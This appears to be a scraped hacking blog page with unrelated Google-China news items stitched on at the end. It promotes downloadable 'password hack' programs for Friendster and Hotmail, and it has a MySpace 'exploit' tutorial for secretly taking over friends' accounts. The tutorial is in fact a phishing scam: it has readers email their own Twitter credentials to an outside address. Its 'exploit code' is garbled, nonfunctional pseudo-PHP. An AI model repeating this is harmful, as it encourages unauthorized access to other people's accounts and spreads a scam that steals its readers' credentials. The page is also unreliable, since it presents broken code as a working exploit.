Have you lost access to your Friendster account because you can’t figure out your password? With the Hack Friendster Password program you will be able to change the password of your Friendster account with ease. Simply download the program from the link below and get started. This program is to be used responsibly. It was created so that you can change your own password, the password of a friends account who has given you permission to, or a childs account who you need to keep a closer eye on. If you use this for another purpose, I am not to be help responsible for your actions.
To get started with the process, simply download the program and run it. In the first field, enter the email address or profile id of the account. In the other two boxes you’ll need to enter in the new password for the account. Make sure the two boxes match otherwise it will not work correctly. That’s all you have to do. Just hit the button to change the password and it will start the process.

You will see the programs status in the bottom of the program. It will keep you updated with what it’s currently doing. It will contact the Friendster database and then start changing the password. When it has completed you will be notified. You can then proceed to the Friendster site and log in. It’s as simple as that. If you have any questions on getting this program to work just let me know through a comment and I will try to help you out.

Download



Download it here now!

Hack Hotmail Password

 
If you need to gain access to a Hotmail account but have forgotten your password, I’d recommend using the Hack Hotmail Password program to recover the password. It’s a fairly simple tool that will help you gain access to an account that you can’t seem to get into anymore. This tool was created to help you change the password to old accounts of yours that you can’t access anymore, a friends account who has given you permission to access their account, or possibly a child who you feel may need to be watched a bit more closely. If this tool is used for any other purpose I am not to be held responsible for your actions, so use this responsibly.



While it may seem self-explanatory, many people struggle to get this program to work so I’ll just go over it briefly for you. Hack Hotmail Password is a powerful tool that will contact Hotmail and attempt to change the password of the account you have entered. Simply fill in the email box with the email address of the account you’d like to change the password of, then fill in the new password you would like in the next two boxes.

After all this information has been filled out accurately, hit the button to change the password. It will then begin to contact Hotmail and go through the process of setting your new password. It can take anywhere from thirty seconds to a minute so be patient. Updates on what the program is doing will become visible once the process has started. If you have any questions getting this to work correctly feel free to leave a comment on this post and I’ll try and help you as best I can.

Download



Download it here!

 

Learn How To Hack Any MySpace Account Using A Web Based Exploit

Note: We have also created a FaceBook exploit code to hack facebook accounts passwords that seems to be having less problems than the myspace one (myspace is changing their programming lately),
Do you want to learn how to hack Myspace?, Are you looking for a way to hack your friends Myspace account without them fiding out? Interested in finding out ways to hack someones profile? Maybe you want to take a quick peek at their message inbox or use a glitch to use a hacking script. In this article I will show you a fairly easy step by step guide on how to hack myspace user accounts without having to directly hack into myspace and risk getting caught. Ignore all those hacking services, myspace hacks and hackers that charge you money for something you can do on your own for free - hack the password of any of your friends accounts even as a prank or joke. You may also be interested in trying out our How To Hack Twitter Accounts exploit tutorial).

Hack myspace, hacking myspace passwords from user accounts and find out someones myspace password...Is any of it really possible? Yes it is, thanks to Twitter!. By now, you have probably heard the rumors of how unsafe MySpace is and how there are viruses out there that infect it's users, you might have also seen Twitter allows you to synchronize your tweets with Myspace status updates. In doing so, Myspace has created many vulnerabilities for itself by allowing a third party (Twitter) to access their database. This problem is due to Myspace's poor coding/programming which causes all those errors and lacks features making many of its users simply leave for other social networks.

A couple of month's ago I wanted to check my old Myspace account but forgot what email and password I had used to sign up, I sent an email to their technical support but they didn't reply so I decided to put my geek skills to good use and find a way to get my login information back by writing a myspace account hacking code or exploit as they are called.

HOW IT WORKS
Myspace has two databases (one for males and one for females users) where they keep all the information from their users, if you remember the email you use to login but forget your password, you can use the 'Forgot your password?' option, however if like me you don't have any of that information it's impossible to legally recover that account.

If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.

So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned Myspace uses something similar to an email service to contact their databases.

For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password).

Luckily for us, as mentioned above, through the use of Twitter combined with Myspace's poor programing, we can use a friends account to verify your own, in other words, if the person you want to get the login information from is on your friends list on Myspace...you can use your Twitter account to verify your their friend on Myspace and get their login email and password sent to you...but the victim must be on your friends list on myspace.
HOW TO DO IT

1) First off you will need to get your user id and the victims user id name, how do you do this?

Go to the victims profile and look at your browsers address bar, it is located after; myspace.com/THIS_IS_THE_ID. You should see something like this: (I have circled the user id in red)



Write it down somewhere and do the same procedure but this time to find out your own user id, once you have them both you may continue to step 2.
2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.

Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.
3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the myspace user id of the victim and the friend authentication twitter login information. I have taken a screenshot of what parts you have to edit and with what:
 

1. Should be the victims Myspace user id.
2. Should be your twitter email/username to verify your the victims friend on myspace.
3. Should be your twitter password so the database can authentic you really are friends with the victim on Myspace through the third-party sync vulnerability.

When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email...we will have to use a special Subject so the database knows how to read it.

Go to your email address and Compose a new email to myspacepasssupport@techie.com which is one of their customer service emails, in the Subject copy and paste the code below highlighted in gray:

$[search_database = }""{] $find user+id= "", '%verification+id' = }""{ begin_search();


Once you have edited the Subject and entered the email your Composed email should look like the screenshot below, I will numerate each item:



1. The email address of the database's forgotten password customer service.
2. Insert M or F (male or female, if your a male then choose M and if your a female then choose F) in between the Quotes (") so the database knows what gender section to search in when verifying you are on the victims friend list.
3. This is where you insert the victims myspace user id.
4. This is where you insert your myspace user id.
5) After you have correctly written the To: and Subject sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email. Now all you have to do is click Send and wait for the database to send you back it's reply with the information.

It should take from 12-48 hours depending on the traffic Myspace has that day, this is a sample of the email response you'll receive:


THE EXPLOIT CODE
ms_select_db("find", $linkID) or die(msdatabase_error());
$resultID = ms_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(msdatabase_error());

$num_rows = db_num_rows($resultID);
$row = myspace_fetch_array($resultID);
$user_id = $row[0];

if ($user_id == "PUTUSERIDHERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that ID.
}
else {
// print "We're sorry, your friend ID does not appear to be in our database."

$passwordfromdb = $row[0];
$find userID = (%friend_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "PUTEMAILHERE"; (%friend_vulnerability_email%)
#user password = "PUTPASSWORDHERE"; (%friend_vulnerability_pass%)
$friend_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email

session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {

}
elseif (empty($email_address)) {
   echo $empty_fields_message;
function decrypt userID password() {
     $salt = "abchefghjkmnpqrstuvwxyz0123456789";
     srand((double)microtime()*1000000);
     $i = 0;
     while ($i <= 7) {
             $num = decrypt() % 33;
             $tmp = substr($salt, $num, 1);
             $pass = $pass . $tmp;
             $i++;
    }
    return $pass;
  }

mail($email_address, $subject, $message, "Forgotten Password Information:


}
/end$

Google hacks not from inside Chinese schools says China

President Obama
President Obama has said he is "troubled" by the attacks on Google.

The Chinese government has denied that Google Gmail accounts were hacked into from school computers.
Shanghai Jiaotong University and Lanxiang Vocational School were named by US investigators as the likely origins of the hacks.
Foreign Ministry spokesperson Ma Zhaoxu branded the accusation "groundless".
He added that it was "irresponsible" to blame the government for the attacks, which led to Google threatening to pull out of China altogether.
Ma Zhaoxu was speaking at a press briefing.
Meanwhile Google and China are set to resume talks about Google's wish to operate an unfiltered internet search engine in the country according to the Wall Street Journal.
The Journal said that officials from both parties were due to meet again after the Chinese New Year celebrations in mid-February.
At the moment Google is still censoring search results in China, but it said in January that it would stop filtering results even if this action resulted in its Chinese operation being forced to close.

Technical error hits Google China

Google logo outside its Beijing office
Google stopped censoring search results on 22 March

Google has said that a problem that meant that Chinese users of its service were unable to access search results on 30 March was due to a technical error.
Many reports had speculated that the block may have been put in place by the Chinese government.
Earlier this month Google stopped censoring its search results in China in defiance of the government.
The company now redirects Chinese users to the uncensored pages of its Hong Kong website.
A spokesperson for the firm said that "lots of users" had been unable to access the Hong Kong site today.
"This blockage seems to have been triggered by a change on Google's part," the spokesperson said.
The firm said that in the last 24 hours the letters "gs_rfai" started appearing in the URLs of Google searches globally.
"The great firewall was associating these searches with Radio Free Asia, a service that has been inaccessible in China for a long time -hence the blockage," said the spokesperson.
"We are currently looking at how to resolve this issue."
Google first outlined its plans to stop censoring search results on 12 January after it revealed that it had been targeted in a sophisticated cyber attack thought to originate in China.
The attacks - which also affected 20 other companies - were thought to target the e-mail accounts of human rights activists.
After weeks of negotiations, the firm finally stopped censoring results on the 22 March.

Recommend us on Google!

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More